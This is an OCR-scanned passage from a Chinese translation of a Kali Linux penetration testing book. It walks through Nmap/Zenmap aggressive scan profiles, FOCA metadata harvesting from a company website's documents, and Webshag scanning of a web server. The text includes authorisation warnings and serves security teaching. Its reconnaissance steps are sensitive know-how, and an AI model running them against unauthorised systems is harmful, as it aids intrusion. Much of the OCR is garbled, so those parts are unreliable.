种 扫描 。 人 的 本 能 反应 可 能 会 在 执行 过 后 就 删除 配置 。 这 里 有 个 善意 建议 : 配置 并 不 怎么 占 存储 
空间 ,而 且 在 你 想 重 新 创建 扫描 时 非常 方便 。 我们 建议 配置 名 称 一 定 要 描述 清楚 用 途 ， 并 应 该 体 
人 循 一 定 的 标准 命名 方式 。 我 的 所 有 配置 名 称 部 是 以 日 期 、 时 间 、 我 的 位 置 、 目 标 网 络 的 扫描 位 置 
以 及 客户 名 称 开 头 。 


Profile Scan Ping Scripting Target Source Other Timing 


Profile Information 


Profile name [My First Scan 


Description 3-20-13 at 11:00am CDT 
Dr Chaos network Scan. Target hosts 10.0.1.0/24] 


在 完成 描述 后 ， 点 击 Scan 标签 。 在 Targets 部 分 ， 你 可 以 添加 要 扫描 的 主机 或 网 络 。 这 个 字 
段 可 以 填 IP 地 址 的 范围 (10.0.1.1-255 ), 或 是 CIDR 格 式 * 的 网 络 (10.0.1.0/24 )。 


你 可 以 看 到 选项 -A 被 默认 选中 了 , 它 会 打开 进攻 性 扫描 模式 (Aggressive Scanning ). 进攻 性 
扫描 会 打开 OS 检测 ( -O )、 版 本 检测 -sV )、 脚 本 扫描 (-sC ) 和 路 由 追踪 ( --traceroute ) wE 
要 的 ， 进 攻 性 扫描 模式 允许 用 户 打开 多 个 开关 而 不 必 记 住 它们 。 


进攻 性 扫描 可 以 认为 是 入 侵 性 的 , 也 就 是 说 , 它 会 被 大 多 数 安全 设备 发 现 。 如 末 你 的 目标 是 
一 个 极其 确定 的 主机 ， 进攻 性 扫描 才 可 能 不 被 注意 到 。 但 不 管 怎 样 , 我 们 建议 你 在 将 其 用 在 扫描 


(D Classless Inter-Domain Routing， 无 类 别 域 间 路 由 ， 是 一 个 用 于 给 用 户 分 配 耻 地 址 以 及 在 互联 网 上 有 效 地 路 由 卫 数 
te ELAN IPHONE VAS TIE. PEATE 
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zm 


选项 中 时 , 一 定 要 先 得 到 对 方 的 许可 。 提醒 一 下 ,对 未 授权 系统 完成 三 次 握手 中 的 ACK 在 类 国标 
准 中 都 算 违法 。 


我 们 可 以 用 在 DNS 侦 查实 践 中 收集 的 信息 来 定位 特定 主机 。 开 始 之 前 ， 先 来 设置 一 些 常 见 
选项 。 


Inmap -T4 -A -v 10.0.1.0/24 


profile | Scan Ping Scripting Target Source Other Timing 


Scan options 


Targets (optional): 110.0.1.0/24 


TCP scan: None 


Non-TCP scans: None 


Timing template: Aggressive (-T4) 
V| Enable all advanced/aggressive options (-A) 
Operating system detection (-O) 

Version detection (-sV) 


Idle Scan (Zombie) (-sl) | 


FTP bounce attack (-b) | 


Disable reverse DNS resolution (-n) 


IPv6 support (-6) 


点 击 Ping 标 签 , 选择 -Pn 开关 选项 , 这 样 Nmap 就 不 会 先 ping 该 主机 。 如 果 此 开关 未 开启 , Nmap 
会 完 对 目标 主机 和 网 络 进 行 ping。 在 默认 设置 中 它 只 对 认为 是 处 于 活动 状态 或 可 到 达 的 主机 进行 
扫描 。-Pn 开 关 告 诉 Nmap 即 使 没收 到 ping 应 答 也 要 对 该 主机 进行 扫描 ， 尺 管 这 样 可 能 会 让 扫描 的 
时 间 变 长 。-Pn 开 关 可 以 避 倪 Nmap 扫 描 时 的 一 个 常见 问题 ping 请 求 被 安全 防御 系统 拦截 ， 收 
不 到 ping 应 答 。 


[nmap -T4 -A -v -Pn 10.0.1.0/24 Scan| 


Profile | Scan Ping | Scripting | Target | Source | Other | Timin Help 
| | p na| 9 | | | 9| SCTPINIT ping probes 
Ping options 


Send SCTP INIT chunk 
packets to see if targets are 


口 ICMP ping (-PE) up. Give a list of ports or 
leave the argument blank to 


[C] ICMP timestamp request (-PP) use a default port. 


C] ICMP netmask request (- PM) 
: Example input: 
gog ACK ping (-PA) 20.80 179 
C SYN ping (-PS) 
口 UDP probes (-PU) 
C IPProto probes (-PO) 
O SCTP INIT ping probes (-PY) 


X Cancel | - Save Changes 
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点 击 右 下 角 的 Save Changes 按 钮 保存 修改 。 保 存 后 ， 点 击 屏 龙 右 上 角 的 Scan 按 钮 开始 扫 摘 。 
注意 你 在 配置 编辑 硕 中 设 定 的 选项 和 目标 这 时 会 显示 出 来 。 


Scan Tools Profile Help 


Target: [10.0.1.0/24 T | Profile: lintense scan ¥ | Scan | Cancel 
Command: [nmap -T4 -A -v 10.0.1.0/24 


| Hosts Services 3l Sap Output s Ports / Hosts | Topology | Host Details scans - 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-21 
00:16 CDT 

NSE: Loaded 106 scripts for scanning. 

NSE: Script Pre-scanning. 


网 络 的 Topology 标 签 可 以 用 来 快速 查看 对 目标 网 络 扫描 的 进度 ， 以 及 是 否 要 经 过 一 些 路 由 
船 。 在 本 例 中 ， 你 可 以 看 到 我 们 的 扫描 是 在 本 地 网 络 。 


Hosts 标 签 会 列 出 已 经 发 现 的 主机 。 


5ran Tools s Profile Help 


Target: [10.0.1.0/24 -| Profile: [intense scan -| Scan | Canci | 


Command: |nmap -T4 -A -v 10.0.1.0/24 
| Hosts Services | Nmap Output | Paris Í Hosts Topology | Host Details | Scans | 
Os Host T ^ Hosts Viewer T Fisheye) 7 Controls [cd Save Graphie | 


10.0.1.103 
10.0.1.104 
10.0.1.107 
10.0.1.112 
10.0.1.113 
10.0.1.122 


10.0.1.125 @@:: ,0.1.107 
10.0.1.140 ! 

1001142 i Qo. 0.1.14 (a ) 10.0.1.112 
| Orodna Bato 0.1.125 


e 


选 定 某 个 主机 ，Zenmap 会 显示 一 个 详细 的 列表 ， 包 括 主机 、 它 们 的 操作 系统 和 常见 服务 。 
在 下 面 的 截图 中 ， 你 可 以 看 到 我 们 的 主机 之 一 是 一 人 台 卫 星 DVR/ 接 收 需 组 合 


IJ 
^ 
| 
| 
i 
| 
a 
" 
^ 
Lr 


Scan Tools Profile Help 


Target: [10.0.1.0/24 bd Profile: [intense scan | scan| Cancel 


Command: |nmap -T4 -A -v 10.0.1.0/24 


| Hosts Services | Nmap Output | Ports / Hosts | Topology Host Details | scans | 


os Host * 10.0.1.140 
L/ 10.0.1.1 * Host Status 


AY 10.0.1.103 ae ^) 
n ports: 
LJ 10.0.1.104 po 


Filtered ports: 0 
LJ 10.0.1.107 Closed ports: 996 
{J 100.1.112 Scanned ports: 1000 


D 10.0.1.113 Up time: 79217 P 


W 10.0.1.122 Last boot: Wed Mar 20 02:33:16 2013 
@ 10.0.1.125 OEE 


@ 10.0.1.142 : IPv6: Not available 
: MAC: 00:0D:C5:86:80:8F 


7 Operating System 
Name: Dish Network VIP 722k DVR (Linux 2.6) 


Accuracy: 


> Ports used 
> OS Classes 


> TCP Sequence 
> IP ID Sequence 
> TCP TS Sequence 


> Comments 
Filter Hosts 


如 果 你 是 在 扫描 窗口 , 你 不 仅 能 看 到 在 特定 主机 上 哪些 端口 是 打开 的 , 而 且 能 知道 那些 主机 

上 运行 看 哪些 应 用 。 注意 Nmap 能 够 判定 一 些 事情 ， 比 如 某 个 服务 融 在 端口 80 上 运行 着 IIS 5.0 作 为 

Web 服 务 需 。 扫 描 结 果 会 列 出 该 服务 天 的 耻 地 址 、 该 服务 带 运 行 的 操作 系统 ， 以 及 该 主机 上 运行 
的 Web 应 用 。 渗 透 测试 人 员 会 发 现在 针对 该 主机 找寻 可 利用 漏洞 时 ， 这 些 结果 很 有 用 。 


Scan Tools Profile Help 


Target: [10.0.1.0/24 m | Profile: [Intense scan Y | Scan| Cancel| 
! Command: [nmap -T4 -A -v 10.0.1.0/24 


Hosts | Services Nmap Output [Pors / Hosts s | Topology | He Host Details [scams] — 
EXE = | Ínmap -T4 -A -v 10.0.1.0/24 


Vai WA!!! 44.0.0 ~ Ac... UJ 
Dragon!DSConsole Uptime quess: 13.319 days (since Thu Mar 7 15:48:25 2013) 
airport-admin Network Distance: 1 hop 


TCP Sequence ee reon Difficulty=266 (Good luck!) 
daap IP ID Sequence Generation: Randomized 


domain TRACEROUTE 
hp-gsg HOP RTT ADDRESS 


DEN 1 5.12 ms 10.0.1.104 


"m Nmap scan report for 10.0.1.107 
jetdirect Host is up (0.0063s latency). 
netbios-ssn Not shown: 984 closed ports 
; PORT STATE SERVICE VERSION 
printer 80/tcp open http HP Officejet Pro 8600 printer http config 
qsc i (Serial CN27KBWHX005KC) 
: | http-favicon: Unknown favicon MD5: A14D3BAA6A6746D1A77AFB1E1DC82FO0F 
rtsp * | http-methods: GET 
snet-sensor-mgmt led Site doesn't have a title (text/html; charset-UTF-8). 
/tcp open tcpwrapped 
ssh 443/tcp open ssl/http HP Officejet Pro 8600 printer http config 
(Serial CN27KBWHX005KC) 
| http-favicon: Unknown favicon MD5: A14D3BAA6A6746D1A77AFB1E1DC82F0F 
tcpwrapped | http-methods: GET 
| http-title: Site doesn't have a title (text/html; charset=UTF-8). 
unknown | ssl-cert: Subject: commonName-HPC7761D/organizationName-HP/ 
stateOrProvinceName=Washington/countryName=US 
| Issuer: commonNamezHPC7761D/organizationNamezHP/stateOrProvinceNamezWashington/ 
countryName=US 
Public Key type: rsa 
Public Key bits: 1024 
Not valid before: 2012-08-03T14:39:21«00:00 
Not valid after:  2032-07-29T14:39:21«00:00 
MD5: ca9e 0de8 7081 bcbe a87b aefa 27a0 elOd 
SHA-1: 91e5 ee6a 5985 c739 c950 6437 500a 5257 f896 c5c7 


Filter Hosts mm 人 de^ SAIDI AD VATII.IN. HE. AALAN. CERNE mE AR 大 mmm lann] tima 


sun-answerbook 
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现在 你 可 以 将 精力 集中 到 目标 上 运行 的 Web 服 务 或 是 80 端 口上 ， 因 为 它 是 打开 的 。 


Zenmap 是 从 Nmap 扫 描 中 获取 输出 的 最 佳 方式 .Zenmap 提 供 了 丰富 的 图 形 化 用 户 界 面 来 显示 
扫 拉 结果。 结果 可 以 导出 为 多 种 格式 ， 如 文本 或 是 微软 的 Excel。 


尽管 有 多 种 方式 可 以 获得 Nmap 的 输出 ( 比如 本 书 作者 喜欢 用 命令 行 命令 ), 但 我 们 还 是 介绍 
这 种 方式 ， 因 为 它 在 很 多 Web 渗 透 标准 中 者 一直 被 提 到 ， 是 常见 的 使 用 方式 。 


Nmap Output | Ports / Hosts | Topology | Host Details | Scans | 


nmap -T4 -A -v 10.0.1.0/24 


Initiating SYN Stealth Scan at 19:58 
Scanning 5 hosts [1000 ports/host] 
Discovered open port 8888/tcp on 10.0.1.104 
Discovered open port 8880/tcp on 10.0.1.107 
Discovered open port 445/tcp on 10.0.1.107 
Discovered open port 53/tcp on 10.8.1.103 
Discovered open port 22/tcp on 10.0.1.103 
Discovered open port 80/tcp on 10.0.1.103 
Discovered open port 80/tcp on 10.0.1.107 
Discovered open port 443/tcp on 10.0.1.107 
Discovered open port 80/tcp on 10.0.1.104 
Discovered open port 443/tcp on 10.0.1.104 
Discovered open port 139/tcp on 10.0.1.107 
Discovered open port 53/tcp on 108.0.1.1 
Discovered open port 9100/tcp on 16.6.1.167 
Discovered open port 631/tcp on 18.0.1.107 
Discovered open port 9290/tcp on 10.0.1.107 
Discovered open port 9111/tcp on 10.0.1.107 
Discovered open port 6839/tcp on 18.0.1.107 
Discovered open port 9110/tcp on 10.0.1.107 
Discovered open port 9102/tcp on 10.0.1.107 
Discovered open port 9220/tcp on 10.0.1.107 
Discovered open port 515/tcp on 10.0.1.107 
Discovered open port 9101/tcp on 10.0.1.107 
Discovered open port 787/tcp on 10.0.1.184 
Discovered open port 7435/tcp on 10.0.1.107 
Completed SYN Stealth Scan against 10.0.1.104 in 
1.27s (4 hosts left) 

Completed SYN Stealth Scan against 10.0.1.107 in 
1.27s (3 hosts left) 

Discovered open port 5009/tcp on 10.0.1.1 


HIN, Zenmapl GUI JL 77 NIFH KA secus PE IT LACS V SCPE BM Fr 
文件 格式 导出 。 在 创建 报告 时 这 些 导 出 的 结果 非常 有 用 。 


Nmap Output | Ports | Hosts Topology | Host Details | scans | 


“Hosts Viewer | «4 eye) ; Controls. ici Save Graphic | 


FOCA: 网 站 元 数据 侦察 工具 


你 知道 在 每 次 创建 文档 时 ， 如 微软 的 PowerPoint 演 示 、 微 软 的 Word 文 档 或 是 PDF， 你 都 会 留 
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一 些 元 数据 在 文档 中 吗 ? 

什么 是 元 数据 ? 就 是 有 关 数 据 的 数据 。 它 是 有 关 特 定数 据 集 、 对 象 或 资源 的 摘 述 性 信息 , 包 
括 所 采用 的 格式 及 其 创建 时 间 和 创建 者 。 对 于 渗透 测试 人 员 ， 元 数据 可 能 很 有 用 ,因为 它 含 有 跟 
创建 文件 的 系统 有 关 的 信息 ， 比 如 : 

a 登录 到 该 系统 的 用 记名 称 ; 

a 创建 该 文档 的 软件 ; 

a 创建 该 文档 的 系统 上 安装 的 操作 系统 。 

FOCA 是 一 个 安全 审计 工具 ， 它 会 检查 来 自 特 定 域 的 元 数据 。 你 可 以 让 FOCA 使 用 搜索 引擎 
来 找到 域 中 的 文件 ， 或 是 直接 使 用 本 地 文件 。 


FOCAÆ Kait Er, 不 过 ,那个 版 本 有 点 古老 了 。 最 好 的 办 法 是 下 载 最 新 版 本 。FOCA 一 直 
以 来 都 是 Windows 上 的 工具 ， 所 以 最 新 的 版 本 通常 都 只 在 Windows 上 才 有 。 


FOCA 的 最 新 版 本 可 以 从 http:/www.informatica64.com/DownloadFOCA ( FJ LA Hj Google 
Translate 将 该 页 面 转 换 成 英文 或 中 文 ) 下 载 。 


在 屏 才 下 方 输 入 目 己 的 Email 地 址 , 你 会 收 到 一 封 市 有 下 载 链接 地 址 的 邮件 。 在 FOCA 有 新 的 
发 布 版 本 时 ， 你 也 会 收 到 更 新 通知 。 


(1) 局 动 FOCA 之 后 的 第 一 件 事 是 创建 一 个 新 项 目 ， 如 下 面 的 截图 中 所 示 : 


f^ FOCA 3.2 


Compiled flags [ FREE ] 


hito www informaticab4 com/foca aspx 
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M 我 们 建议 将 所 有 项 目 文 件 都 保存 在 同一 个 位 置 。 你 应 该 为 每 个 项 目 创建 一 
个 新 的 目录 。 


(2) 在 给 项 目 起 好 名 字 、 选 定 存 放 项 目 文件 的 位 置 后 ， 点 击 Create 按 钮 ， 如 下 面 的 玲 图 所 示 : 


Would you like that 
FOCA TEAM makes a 
penetration test on 
your web site?/ 

p 


Jo 


50 $23 WR 


y 


(3) 下 一 步 就 是 保存 项 目 文件 。 保 存 好 项 目 后 ， 点 击 Search Al 按钮 ，FOCA 会 使 用 搜索 引擎 
来 扫描 文档 。 你 也 可 以 选择 使 用 本 地 文档 。 


Test Project - FOCA Free 3.2 
]-|Project "Tools Options |; Tasklist About [SJ Donate 


El) Test Project 
-) Network 


mou v xls [y] ppsx [y] 
=j Clients (1) : docx [yl xlsx [i] sxi 
*-8$ PC Joey Muniz vl w 加 


3| Servers (0) 
ij, Unlocated Servers 
— Domains 
(3 Roles 
@ Vulnerabilities 


EE E — Imelu [ono Doon Dae [Sacra 


Documents (1/140) (85 Vopsf Home Desktop DigitalLife Deck pptx 10/27/2012 1:09:31... 2.94 MB 
a =) pptx (1) l) 1 = http://www wwt.com/products services/documents/CC ... 10/27/2012 1:09:32... 384 KB 
E-an Ta em iul]? doc http://www wwt.com/missouri/docs/eep.doc 10/27/2012 1:09:32... 28.5 KB 

Es) Folders (0) E http://www wwt.com/products services/documents/CC ... 10/27/2012 1:09:33... 397 KB 
10/27/2012 1:09:36... | 3645 KB 

10/27/2012 1:09:34... 365 KB 
10/27/2012 1:09:35... | 366.5 KB 
10/27/2012 1:09:36... | 120.5 KB 
10/27/2012 1:09:37... | 370.5 KB 
10/27/2012 1:09:37... 104 KB 
10/27/2012 1:09:39... 636.5 KB 
10/27/2012 1:09:38... | 100.5 KB 


Custom search 


8 Printers (0) http://www wwt.com/products services/documents/Qo... 
动 Software (2) http://www wwt.com/products services/documents/DC ... 


E Emails (0) https://www .wwt.com/products services/documents/C ... 
£3 Operating Systems (0) http://www wwt.com/markets/federal/NIHT1E xls 
Qa Passwords (0) http://www wwt.com/federal/images/NIH2 xls 
司 Servers (0) http://www wwt.com/markets/federal/NIH3 xls 
http://www wwt.com/federal/images/NIH1C xis 
http://www wwt.com/federal/images/NIH 1B xis 


e ùo o o o o ùo o o o 
X X X XXX XX xx 


Downloaded document: http://www wwt.com/markets/documents/eduSafetyHiEd-broch 121707 pdf 
Downloaded document: http://www wwt.com/news events/documents/STLBJ 3-5-03 pdf 
Downloaded document: http://www wwt.com/news events/documents/NACSecurityRoadshow9-10... 
Downloaded document: http://www .wwt.com/news_events/documents/FCW_ECS4-26-04 pdf 
Downloaded document: http://www .wwt.com/news events/documents/STLBJ 4-14-03 pdf 
Downloaded document: http://www wwt.com/news events/documents/SBC press release 4-22-0... 


3 Conf E ——— Clear | 


g 111/140 


(4) 右键 点 击 该 文件 ， 选 择 Download 选 项 ， 如 下 面 的 截图 所 示 : 


Custom search 


\\pef\\Home Desktop Digital ifeDeck pptx E ES 
http://www wwt.com/products services/documents/ LL... [高 Download All 
http://www wwt.com.missouri/docs/eep.doc 

http://www wwt.com/products. services/documents/ LC... 
http www vent com. products services/documents/o... 
http://www .wwt.com/products services/documents/DC ... 


https: www wwt.com/products services/documents./C... 


Xx 


à Delete 
Delete All 


Extract Metadata 


http) www wwt.com./markets;/Tederal/MIH 1E xls $] Extract All Metada 
http www wwt .com;/Tederal/images/MIH2 xls Analyze Metadata 
http www wwt.com;/markets;/Tederal/MIH3 xls 
http://www wwt.com;Tederal/images/MIH1C xls 
hitp www wwt.com/Tederal/Amages/NIHT1B xls F Add folder 


Add file 


x X MX X X X Xx X X X 


Add URLs from file 


Link 


e methods found (trace) on http://www wwt .com/markets/documents/^ 


(5) 右键 点 击 该 文件 ， 选 择 Extract Metadata 选 项 ， 如 下 面 的 截图 所 示 : 


Test Project - FOCA Free 3.2 


= Project "Tools -g$ Options 
3 Test Project 
=) et) Network 
#289 Clents (1) 
E Servers (0) 
Ü. Unlocated Servers 
由 -一 Domains 
(£ (9 Roles 
E g Vulnerabilities 
= Metadata 
pptx (1) 
日 -一 Metadata Summary 
& Users (2) 
Ga Folders (0) 
É Printers (0) 
45 Software (2) 
C] Emails (0) 
AF Operating Systems (0) 
&, Passwords (0) 
§ Servers (0) 


Qj Tasit ^ About (=) Donate 


F 


Vpsf Home Desktop Digital fe Deck potx 

http://www .wwt.com/products_services/documents/CC.._ 
http://www .wwt.com/missoun/docs/eep doc 
http:/Awwew wwt.com/products_services/documents/COC 
http://www wwt.com/products_services/documents/Qo 
http -/ Avwew wwt.com/products services/documents/DC 
https ://www_.wwt.com/products_services/documents/C.. 
http:/Awvew wwt.com/markets federal//NIH1 Eds 
http//www wat com federal *mages/NIH2 xis 
http://www. wwt com/markets federal/NIH3 xls 
http://www wwt.com/federal/mages/NIH1C xls 

http -//www wwt.com/federal/images/NIH1B xls 


Downloaded document: htp://www. wwa con/documents/CRNWhatCloudMeansWWT pdf 
OEE SEREIA REAO a QU: 


Document metadata extracted: Nonatos M FOCA Prosa Du Suec (sa 
Downloaded document: http://www wwt.com/news : everts/documents ANWT. SunDCBestPractice... 


= 


Downloading 59/140 
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10/27/2012 1:09:31. 
10/27/2012 1:09:32... 
10/27/2012 1:09:32... 
10/27/2012 1:09:33.. 
10/27/2012 1:09:36. 
10/27/2012 1:09:34. 
10/27/2012 1:09:35... 
10/27/2012 1:09:36.. 
10/27/2012 1:09:37.. 


10/27/2012 1:09:37 


10/27/2012 1:09:39.. 
10/27/2012 1:09:38... 


V ppsx | sxc 


ly] sxi 
M odt 


(6) 右键 点 击 该 文件 ， 选 择 Analyze Metadata 和 选项， 如 下 面 的 截图 所 示 : 


Test Project - FOCA Free 3.2 


[= Project Tools .<)Options |; Taskist Á About (J Donate 


Eg Test Project 
BE- Network 
$- Cents (1) 
=} (Gj Servers (0) 
E Unlocated Servers 


\\psf \Home \Desktop Digital Life Deck pptx 

http://www, wwt.com/products services/documents/CC 
http://www wwt.com/missoun/docs/eep doc 

http://www wwt.com/products services/documents/CC. 
http://www wwt.com/products, services/documents/Qo 
http. //www wwt.com/products services/documents/DC. 
https://www wwt.com/p vents/ C. 
http //www wwt.com/markets/teaeral/NIH it xis 

hitp:/ Awww wwt.com/federal/images/NIH2 xls 
http://www wwt.com/markets federal/NIH3 xis 

hitp:/ Awww wwt .com/federal/images/NIH1C xls 
http://www wwt.com/federal/images/NIH 1B xis 


V doc ly) xis 


M. ppsx IJ sxc 


M ppt W) docx Wxisx 加 sx 


10/27/2012 1:09:31 
10/27/2012 1:08:32 . 
10/27/2012 1:09:32... 
10/27/2012 1:09:33... 
10/27/2012 1:09:36. 
10/27/2012 1:09:34... 
10/27/2012 1:09:35 


10/27/2012 1:09:36. . 
10/27/2012 1:09:37 
10/27/2012 1:09:37... 
10/27/2012 1:09:39 
10/27/2012 1:09:38... 
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在 下 面 的 视图 中 ， 


Test Project - FOCA Free 3.2 
" Tools .<}Options OO Tasklist About [SJ Donate 


| Project 
E Q3 Test Project 
H-2 Network 
‘BH Clients (1) 
日 - 国 Servers (0) 
(f, Unlocated Servers 


D-H- 


Di 


~ Domains 

(3 Roles 

g Vulnerabilities 
[> Metadata 


` Documents (1/140) 


2-081 pptx (1) 


H- Metadata Summary 


eue 


-Ea Folders (0) 


(3 Printers (0) 


{i Software (2) 
[7] Emails (0) 
E Operating Systems (0) 
Qa Passwords (0) 
(3) Servers (0) 


Test Project - FOCA Free 3.2 


]- Project 

E Q3 Test Project 
o- Network 

i} Clients (1) 


-e-e 


日 


"Tools -5$ Options 


(3) Servers (0) 


(fi, Unlocated Servers 


-= Domains 
(3 Roles 
I Vulnerabilities 


[ Metadata 


‘> Documents (1/140) 


(8l pptx (1) 


=| Metadata Summary 


h3 Users (2) 

Ea Folders (0) 

(& Printers (0) 
De 

C] Emails (0) 

22 Operating Systems (0) 
Qa Passwords (0) 

(3) Servers (0) 


你 可 以 看 到 有 两 个 人 打开 过 这 个 文档 。 


FOcA 


All users found (2) - Times found 


Joey Muniz 
Aamir Lakhani 


Dowrloaded document: http://www wwt.com/markets/documents/WWT TG500CiscoTelepresence. ... 
Downloaded document: http://www .wwt.com/extemal content/downloads/CashmanEquipmentSuc... 
Downloaded document: http://www .wwt.com/news events/documents/WWT  WirelessMobilityinHC... 
Downloaded document: http://www .wwt.com/news events/documents/stlbj 9 0 05 pdf 

Downloaded document: http://www wwt.com/extemal content/downloads/CSMars Data Sheet pdf 

Downloaded document: http://www .wwt.com/news events/documents/WWT Desktop Virtualizatio ... 


a 


(3| Tasklist Á About G Donate 


All software found (2) - Times found 


Microsoft Office for Mac 
Adobe Photoshop CS3 


Downloaded document: http://www. wwt.com/extemal content/downloads/CashmanEquipment Suc... 
Downloaded document: http://www .wwt.com/news, events/documents/WWT  WirelessMobilityinHC... 
Downloaded document: http://www .wwt.com/news, events/documents/stlbj 9 0 05. pdf 
Downloaded document: http://www wwt.com/extemal content/downloads/CSMars Data Sheet pdf 
Downloaded document: http://www wwt.com/news events/documents/WWT Desktop Virtualizatio ... 
Downloaded document: http://www .wwt.com/news, events/documents/GCN 021307 pdf 


sa 


|=] Save log to File 
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在 许多 情况 中 ， 攻 击 者 都 能 够 看 到 更 多 的 信息 ， 并 通过 这 种 方式 来 收集 有 关 目 标的 情报 。 


FOCA 人 允许 用 户 保存 一 份 所 有 元 数据 的 副本 ， 并 对 其 建立 索引 。 男 外 ， 每 种 类 型 的 元 数据 文 
件 也 会 保存 一 份 。 这 将 使 渗透 测试 人 员 可 以 获得 大 量 的 信息 。 前 面 的 截图 中 通 第 给 出 的 部 是 索引 
文件 的 整体 ， 以 及 所 有 文件 的 列表 。 最 后 ，FOCA 人 允许 渗透 测试 人 员 下 载 所 有 文件 ， 然 后 跟前 面 
例子 中 一 样 使 用 。 


2.3 Mz 


WF i EB MAS Pa AAP, 也 是 最 耗 时 的 一 步 。 针对 目标 采取 的 所 有 行动 都 
是 围绕 侦察 结果 展开 的 。 了 解 到 的 有 关 目 标的 信息 越 多 , 你 触发 目标 安全 防御 系统 警报 的 概率 就 
越 低 ， 找 到 攻 入 目标 系统 的 途径 的 概率 也 就 越 大 。 建 议 大 家 在 阅读 本 书后 面 内 容 之 前 ， 先 认真 把 
本 章 看 完 。 

本 和 草 中 , 我 们 着 重 介绍 了 收集 跟 目 标 有 关 信 息 的 各 种 途径 。 我 们 演示 了 一 些 互联 网 上 常见 的 
人 饭 费 工具 ， 以 及 Kali Linux 中 的 Information Gathering 工 具 。 从 这 里 开始 ， 你 就 可 以 通过 侦察 来 对 
目标 进行 测试 ， 找 到 可 能 利用 的 漏洞 了 。 


下 一 章 我 们 将 会 着 重 介绍 如 何 找 出 和 利用 Web 应 用 及 Web 服 务 器 中 的 漏洞 。 


AR S5 8 Yin BOG 


服务 需 是 网 络 中 的 专用 计算 系统 , 用 于 运行 针对 用 户 和 其 他 计算 机 的 服务 。 这 类 服务 的 例子 
太 多 了 ， 比 如 在 线 游戏 之 类 的 公共 服务 和 大 型 企业 内 部 共享 机 密 文 件 的 服务 ， 等 等。 在 客户 并- 
服务 硕 架 构 中 ， 服 务 带 运行 用 于 啊 应 其 他 程序 ( 也 就 是 客户 问 ) 的 请 求 的 程序 。 因 此 ， 服 务 大 会 
代 蔡 “客户 问 ” 执 行 一 些 计 算 性 任务 。 客 户 并 要 么 运行 在 同一 台电 脑 上 ,要 人 么 可 以 通过 网 络 连 接 
到 服务 闫 。 最 价 单 的 例子 就 是 服务 融 面 加 全 世界 托管 某 个 游戏 ， 而 客户 端 可 以 远程 访问 该 游戏 。 
问 客户 闪 提 供 服务 的 形式 多 种 多 样 , 如 仅 局 限于 HTTP 的 Apache Webi ka at, 或 是 除了 HTTP 还 文 
持 更 多 功能 的 BEA WebLosgic 应 用 服务 器 。 


网 络 服务 名 通常 都 会 配置 成 能 够 处 理 大 量 客户 端 请 求 。 这 意味 看 更 大 的 计算 能 力 、 内 存 和 
存储 ， 对 有 客 来 说 这 些 资 产 都 是 很 有 价值 的 。 企 业 通 第 部 是 远程 管理 这 些 服务 带 ， 并 不 会 主动 
监测 上 面 的 活动 ， 也 就 是 说 ,性 能 或 其 他 指标 上 的 一 点 微小 的 损耗 也 不 会 被 注意 到 。 通 党 恶 章 
用 户 都 是 使 用 了 受 危 害 服务 硕 很 长 一 段 时 间 之 后 ,服务 天 所 有 者 才 会 发 现 黑客 用 来 访问 系统 的 
Ab LE d th o 

AS RG AS ETA UU] h MAH Web iz FAR SS i P Bud], ASP 28 Kali Pl ir AY PE ER h 08 


HAA LHJPRS. Rab, Fees P28 A a RR Web Ir HIRI ARAR. ANSE SE 
介绍 访问 Web 应 用 服务 从 的 其 他 方法 。 


3.1 漏洞 评估 


服务 硕 奖 攻击 即 找 出 并 利用 服务 策 上 的 服务 、 奖 口 和 应 用 中 的 漏洞 。 举 个 例子 ，Web 服 务 俩 
MAS SUCHE (Attack Vector )。 它 会 运行 一 个 操作 系统 ， 并 运行 各 种 各 样 的 软件 来 提供 Web 
功能 。 它 会 有 很 多 打开 的 TCP 端 口 。 这 些 途 径 中 的 每 一 个 都 有 可 能 找 出 一 个 攻击 者 能 利用 的 漏洞 ， 
攻击 者 可 以 系 此 潜入 系统 并 获取 有 用 的 信息 。 服务 各 上 的 许多 协议 都 是 以 人 类 可 读 的 未 加 密 文 本 
处 理 的 。 


让 我 们 看 看 Kali 中 市 的 那些 用 来 找 出 服务 骨 站 漏洞 的 工具 。 


3.1 漏洞 评估 223 
3.1.1 Webshag 


WebshagZé— ^r Hl T XJ Web se 9 265341] ZA W YE POE A Zee LA Webshagzzli4 pee 
i YX} Weblli 2r 3:8 Age, be aig di. URLFAN. PRAT EG eh REE A 
HTTP 号 份 认 证 〈 基 本 认证 或 摘要 认证 )， 用 它 来 以 HTTP 或 HTTPS 的 方式 扫描 Web 服 务 保 。 此 外 ， 
Webshag 可 以 攒 人 IDS 规 避 能 力 ， 使 请 求 之 间 的 相关 性 变 得 更 复杂 。 


Webshag 还 提供 了 其 他 的 创新 功能 ， 比 如 获取 目标 机 各 上 托管 的 域名 列表 ， 以 及 使 用 动态 生 
成 的 文件 名 进行 模糊 测试 。Webshag 可 以 进行 Web 页 面 的 指纹 收集 ， 从 而 能 够 防止 内 容 变 化 。 这 
个 功能 是 作为 移 除 假 阳 性 的 算法 而 设计 的 ， 旨 在 处 理 服 务 器 返回 的 “soft 404”" 响应。 


Webshag 可 以 用 GUI 方 式 访问 ,也 可 以 用 命令 行 控 制 台 的 方式 访问 。 它 同时 支持 Linux 平 台 和 
Windows 平 台 。 在 Kali Linux 中 ，Webshag 可 以 在 Web Applications > Web Vulnerability Scanners 
中 找到 ， 名 为 webshag-gui。 


Webshag 使 用 起 来 非常 简单 。 每 个 功能 都 会 在 顶部 有 个 标签 。 选 择 想 要 的 功能 标签 ， 在 目标 
空间 中 输入 目标 URL， 然 后 点 击 OK 执 行 。 你 可 以 同时 运行 多 个 标签 。 它 的 功能 包括 亲口 扫 描 、 
爬虫 、URL 扫 摘 和 模糊 测试 。 下 面 四 个 截图 分 别 对 应 Webshag 针 对 www.thesecuritybloggercom 执 
行 端口 扫描 、Web 扑 忠 、URL 扫 描 和 文件 模糊 测试 : 


* webshag 1.10 
File Tools Help 


| PSCAN INFO SPIDER USCAN FUZZ 


Settings 
Target [host | IPv4]: 
www.thesecurityblogger.com 
Results 
Open Ports: Port Details: 
587 
80 


Console: 


INFO Scan of www.thesecurityblogger.com finished 
INFO Found 2 open ports. 


Status 
Idle. Last scan finished (9 17/04/2013 12:05:30 


(D 参见 http://en.wikipedia.org/wiki/JHTTP 404#Soft_ 404。 一 一 译 者 注 


PSCAN INFO SPIDER USCAN FUZZ 


Settings 
Target [host | IPv4]: Port [80]: Start [/index.html]: 
|www.thesecurityblogger.com !|80 | 


Results 
internal directories: 


) 
